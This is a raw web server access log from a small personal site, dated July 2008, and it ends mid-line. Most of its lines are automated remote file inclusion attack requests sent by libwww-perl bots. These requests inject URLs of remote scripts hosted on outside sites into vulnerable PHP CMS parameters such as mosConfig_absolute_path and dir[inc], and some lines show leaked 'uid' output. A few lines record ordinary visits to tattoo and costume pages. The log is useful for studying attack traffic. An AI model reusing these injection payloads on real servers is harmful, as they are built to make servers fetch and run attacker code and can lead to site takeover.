209.97.201.148 - - [31/Jul/2008:08:13:16 -0500] "GET /errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.106.136.226 - - [31/Jul/2008:08:13:44 -0500] "GET /?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
87.106.136.226 - - [31/Jul/2008:08:13:44 -0500] "GET /logs/access_log.1212278400/?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.106.136.226 - - [31/Jul/2008:08:13:44 -0500] "GET /logs/?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
210.245.166.92 - - [31/Jul/2008:08:14:23 -0500] "GET /logs/access_log.1214438400//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:14:24 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:14:25 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
83.12.119.178 - - [31/Jul/2008:08:16:22 -0500] "GET /logs/db.php?path_local=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
83.12.119.178 - - [31/Jul/2008:08:16:31 -0500] "GET /db.php?path_local=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 290 "-""libwww-perl/5.65"
87.230.35.101 - - [31/Jul/2008:08:16:38 -0500] "GET /logs/access_log.1212883200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:08:16:39 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
87.230.35.101 - - [31/Jul/2008:08:16:39 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
87.106.136.226 - - [31/Jul/2008:08:17:43 -0500] "GET /logs/?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
87.106.136.226 - - [31/Jul/2008:08:17:44 -0500] "GET /?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
74.53.89.162 - - [31/Jul/2008:08:18:39 -0500] "GET /logs/access_log.1212883200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:08:18:39 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:08:18:39 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
81.25.54.205 - - [31/Jul/2008:08:19:15 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:08:19:16 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
74.208.68.150 - - [31/Jul/2008:08:19:27 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
74.208.68.150 - - [31/Jul/2008:08:19:28 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
74.208.68.150 - - [31/Jul/2008:08:19:47 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
74.208.68.150 - - [31/Jul/2008:08:19:47 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
210.245.166.92 - - [31/Jul/2008:08:19:48 -0500] "GET /logs/access_log.1212883200//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
213.168.176.11 - - [31/Jul/2008:08:20:14 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
213.168.176.11 - - [31/Jul/2008:08:20:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.symbols-larp.com/inschrijven/symbols5/languages/var.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:20:59 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:20:59 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:21:03 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:21:03 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
125.243.76.61 - - [31/Jul/2008:08:21:23 -0500] "GET /logs/access_log.1212278400/?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
125.243.76.61 - - [31/Jul/2008:08:21:23 -0500] "GET /?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
125.243.76.61 - - [31/Jul/2008:08:21:24 -0500] "GET /logs/?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 200 93415 "-""libwww-perl/5.803"
195.70.36.107 - - [31/Jul/2008:08:21:37 -0500] "GET /logs/access_log.1212883200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
195.70.36.107 - - [31/Jul/2008:08:21:37 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
195.70.36.107 - - [31/Jul/2008:08:21:37 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
81.25.54.205 - - [31/Jul/2008:08:21:59 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:08:22:00 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
125.243.76.61 - - [31/Jul/2008:08:22:32 -0500] "GET /logs/?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93415 "-""libwww-perl/5.803"
125.243.76.61 - - [31/Jul/2008:08:22:32 -0500] "GET /?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
210.245.166.92 - - [31/Jul/2008:08:22:36 -0500] "GET /logs/access_log.1214438400//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:22:36 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:22:37 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:08:23:25 -0500] "GET /logs/access_log.1213142400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
80.74.146.175 - - [31/Jul/2008:08:23:29 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.74.146.175 - - [31/Jul/2008:08:23:29 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.44.234.5 - - [31/Jul/2008:08:23:40 -0500] "GET /logs/access_log.1212278400/?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
207.44.234.5 - - [31/Jul/2008:08:23:40 -0500] "GET /?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
207.44.234.5 - - [31/Jul/2008:08:23:41 -0500] "GET /logs/?dir%5Binc%5D=http://www.attorneychae.com/bbs/icon/icon.png??? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
210.127.253.161 - - [31/Jul/2008:08:23:42 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
210.127.253.161 - - [31/Jul/2008:08:23:43 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
69.93.189.130 - - [31/Jul/2008:08:24:07 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.93.189.130 - - [31/Jul/2008:08:24:07 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.111.173.117 - - [31/Jul/2008:08:24:10 -0500] "GET /logs/access_log.1213142400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:08:24:10 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
89.111.173.117 - - [31/Jul/2008:08:24:11 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
217.107.222.20 - - [31/Jul/2008:08:25:03 -0500] "GET /logs/?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
217.107.222.20 - - [31/Jul/2008:08:25:03 -0500] "GET /?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
62.141.56.49 - - [31/Jul/2008:08:25:09 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
62.141.56.49 - - [31/Jul/2008:08:25:10 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
62.141.56.49 - - [31/Jul/2008:08:25:54 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
62.141.56.49 - - [31/Jul/2008:08:25:54 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
83.85.89.130 - - [31/Jul/2008:08:26:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://tattoos.lovetoknow.com/Art_Designs""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:26:11 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:26:11 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:26:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
218.188.197.136 - - [31/Jul/2008:08:27:05 -0500] "GET /logs/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.188.197.136 - - [31/Jul/2008:08:27:05 -0500] "GET /index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
74.6.18.231 - - [31/Jul/2008:08:27:15 -0500] "GET /logs/access_log.1159833600 HTTP/1.0" 200 150675 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.204.226 - - [31/Jul/2008:08:28:36 -0500] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
67.19.204.226 - - [31/Jul/2008:08:28:36 -0500] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
67.19.204.226 - - [31/Jul/2008:08:28:36 -0500] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
67.19.204.226 - - [31/Jul/2008:08:28:36 -0500] "GET /logs//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 93420 "-""libwww-perl/5.810"
217.107.222.20 - - [31/Jul/2008:08:29:13 -0500] "GET /logs/?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
217.107.222.20 - - [31/Jul/2008:08:29:14 -0500] "GET /?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
212.113.24.150 - - [31/Jul/2008:08:29:46 -0500] "GET /logs//errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:29:46 -0500] "GET //errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:29:52 -0500] "GET /logs//errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:08:29:53 -0500] "GET //errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.73.187.48 - - [31/Jul/2008:08:30:22 -0500] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
69.73.187.48 - - [31/Jul/2008:08:30:22 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
189.102.16.28 - - [31/Jul/2008:08:31:04 -0500] "GET /logs/!scanhttp://www.somosnois.com.br/ooid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:08:31:05 -0500] "GET /!scanhttp://www.somosnois.com.br/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:08:31:12 -0500] "GET /logs/!scanhttp://www.somosnois.com.br/ooid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:08:31:13 -0500] "GET /!scanhttp://www.somosnois.com.br/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:08:32:40 -0500] "GET /!scanhttp://www.somosnois.com.br/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
211.115.72.160 - - [31/Jul/2008:08:33:47 -0500] "GET /logs/?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
211.115.72.160 - - [31/Jul/2008:08:33:49 -0500] "GET /?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
62.169.0.50 - - [31/Jul/2008:08:33:59 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://dantman.com/.../rid????? HTTP/1.1" 404 313 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
62.169.0.50 - - [31/Jul/2008:08:34:00 -0500] "GET //Neos_Chronos/header.php?base_folder=http://dantman.com/.../rid????? HTTP/1.1" 404 308 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
87.106.214.193 - - [31/Jul/2008:08:34:06 -0500] "GET /logs/access_log.1212883200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
87.106.214.193 - - [31/Jul/2008:08:34:06 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
87.106.214.193 - - [31/Jul/2008:08:34:07 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.frico.de/cms/css/images/id2.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
204.15.10.22 - - [31/Jul/2008:08:34:24 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://dantman.com/.../rid????? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
204.15.10.22 - - [31/Jul/2008:08:34:24 -0500] "GET //Neos_Chronos/header.php?base_folder=http://dantman.com/.../rid????? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
87.106.136.226 - - [31/Jul/2008:08:35:23 -0500] "GET /logs//?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93420 "-""libwww-perl/5.805"
87.106.136.226 - - [31/Jul/2008:08:35:26 -0500] "GET //?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
81.25.54.205 - - [31/Jul/2008:08:35:59 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.812"
81.25.54.205 - - [31/Jul/2008:08:36:01 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
207.44.234.5 - - [31/Jul/2008:08:37:07 -0500] "GET /logs/?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
207.44.234.5 - - [31/Jul/2008:08:37:07 -0500] "GET /?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
87.106.191.163 - - [31/Jul/2008:08:38:01 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.191.163 - - [31/Jul/2008:08:38:02 -0500] "GET //Neos_Chronos/header.php?base_folder=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
217.107.222.20 - - [31/Jul/2008:08:38:59 -0500] "GET /logs//?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93420 "-""libwww-perl/5.810"
217.107.222.20 - - [31/Jul/2008:08:39:00 -0500] "GET //?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
217.107.222.20 - - [31/Jul/2008:08:39:27 -0500] "GET /logs//?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 93420 "-""libwww-perl/5.810"
217.107.222.20 - - [31/Jul/2008:08:39:27 -0500] "GET //?dir%5Binc%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
189.102.16.28 - - [31/Jul/2008:08:39:35 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:08:39:36 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
83.85.89.130 - - [31/Jul/2008:08:40:35 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:35 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:35 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:36 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:36 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:36 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:36 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:36 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:37 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:37 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
83.85.89.130 - - [31/Jul/2008:08:40:37 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
81.149.200.53 - - [31/Jul/2008:08:40:37 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
81.149.200.53 - - [31/Jul/2008:08:40:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
81.149.200.53 - - [31/Jul/2008:08:40:41 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
81.149.200.53 - - [31/Jul/2008:08:40:41 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22"
81.149.200.53 - - [31/Jul/2008:08:40:41 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/co